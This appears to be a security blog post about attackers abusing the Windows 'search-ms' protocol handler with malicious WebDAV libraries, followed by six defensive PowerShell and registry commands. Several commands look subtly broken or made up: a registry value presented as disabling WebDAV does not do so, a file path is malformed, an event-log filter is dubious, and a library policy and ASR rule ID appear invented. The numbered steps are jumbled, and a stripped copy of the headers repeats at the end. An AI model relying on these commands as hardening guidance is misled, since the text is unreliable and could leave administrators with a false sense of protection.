Abusing The 'search-ms' URI Protocol Handler: A Persistent Threat In 2025

Introduction

The ‘search-ms’ URI protocol handler in Windows remains a potent attack vector, as highlighted in the June 2025 HP Threat Insights Report. Attackers exploit this feature by crafting malicious libraries that include remote WebDAV shares, tricking users into executing malware disguised as benign files. This technique underscores the importance of understanding protocol handler abuse and implementing defensive measures.

Learning Objectives

Understand how attackers abuse the ‘search-ms’ protocol to deliver malware.
Learn defensive techniques to mitigate such attacks.
Explore command-line tools to detect and analyze malicious URI handlers.

1. Detecting Malicious ‘search-ms’ URI Handlers

Command:

Get-ItemProperty -Path "HKLM:\SOFTWARE\Classes\search-ms\shell\open\command" | Select-Object "(Default)"

Step-by-Step Guide:

This PowerShell command checks the registry for the default handler of the ‘search-ms’ protocol. If the value points to an unusual executable (e.g., `mshta.exe` loading remote HTML), it may indicate compromise.

1. Open PowerShell as Administrator.

2. Run the command above.

Verify the output points to a legitimate Windows binary (e.g., explorer.exe).

2. Disabling WebDAV Shares in Libraries

Command:

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WebClient\Parameters" -Name "BasicAuthLevel" -Value 0

Step-by-Step Guide:

Disabling WebDAV prevents attackers from embedding malicious remote shares in Windows libraries.

1. Open PowerShell as Administrator.

Run the command to disable WebDAV basic authentication.

3. Restart the service:

Restart-Service WebClient

3. Analyzing Suspicious Shortcut (.lnk) Files

Command:

powershell -command "Get-ChildItem -Path C:\Users\Downloads.lnk | Select-Object FullName, TargetPath"

Step-by-Step Guide:

This command lists all `.lnk` files in user download folders and their target paths, helping identify malicious shortcuts.

1. Open Command Prompt or PowerShell.

Execute the command to scan for suspicious shortcuts.
Investigate any `.lnk` files pointing to `mshta.exe` or remote URLs.

4. Blocking ‘mshta.exe’ Execution

Command:

Set-MpPreference -AttackSurfaceReductionRules_Ids "5BEB7EFE-FD9A-4556-801D-275E5FFC04CC" -AttackSurfaceReductionRules_Actions Enabled

Step-by-Step Guide:

Microsoft Defender’s Attack Surface Reduction (ASR) can block `mshta.exe` from executing malicious scripts.

1. Open PowerShell as Administrator.

2. Enable the ASR rule for `mshta.exe`.

Test with a benign HTA file to ensure functionality.

5. Monitoring Process Creation for ‘mshta.exe’

Command:

Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688; Data='mshta.exe'} | Format-List

Step-by-Step Guide:

This command audits process creation events for mshta.exe, a common payload delivery tool.

Ensure Audit Process Creation is enabled in Group Policy.

2. Run the command to review `mshta.exe` executions.

3. Correlate with network logs for external connections.

6. Hardening Windows Libraries

Command:

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Library" /v "DisableShellLibrarySave" /t REG_DWORD /d 1 /f

Step-by-Step Guide:

Disabling library save functionality prevents attackers from creating malicious libraries.

1. Open Command Prompt as Administrator.

2. Execute the command to disable library saves.

Restart the machine for changes to take effect.

What Undercode Say

Key Takeaway 1: Attackers continue to exploit Windows protocol handlers due to their trusted nature and lack of user awareness.
Key Takeaway 2: Defensive measures like ASR rules, WebDAV restrictions, and library hardening can significantly reduce risk.

Analysis:

The persistence of ‘search-ms’ abuse highlights the need for layered security. While Microsoft has introduced mitigations, organizations must proactively monitor and restrict protocol handlers. Future attacks may leverage similar techniques against cloud-based URI handlers, necessitating cross-platform defenses.

Prediction

By 2026, expect attackers to shift focus to cloud storage URI handlers (e.g., `onedrive://` or sharepoint://) as organizations disable legacy protocols like WebDAV. Continuous user education and endpoint detection tools will remain critical.

IT/Security Reporter URL:

Reported By: Stephan Berger – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Listen to this Post

Introduction

Learning Objectives

1. Detecting Malicious ‘search-ms’ URI Handlers

Command:

Step-by-Step Guide:

1. Open PowerShell as Administrator.

2. Run the command above.

2. Disabling WebDAV Shares in Libraries

Command:

Step-by-Step Guide:

1. Open PowerShell as Administrator.

3. Restart the service:

3. Analyzing Suspicious Shortcut (.lnk) Files

Command:

Step-by-Step Guide:

1. Open Command Prompt or PowerShell.

4. Blocking ‘mshta.exe’ Execution

Command:

Step-by-Step Guide:

1. Open PowerShell as Administrator.

2. Enable the ASR rule for `mshta.exe`.

5. Monitoring Process Creation for ‘mshta.exe’

Command:

Step-by-Step Guide:

2. Run the command to review `mshta.exe` executions.

3. Correlate with network logs for external connections.

6. Hardening Windows Libraries

Command:

Step-by-Step Guide:

1. Open Command Prompt as Administrator.

2. Execute the command to disable library saves.

What Undercode Say

Analysis:

Prediction

IT/Security Reporter URL:

Join Our Cyber World:

Related Posts: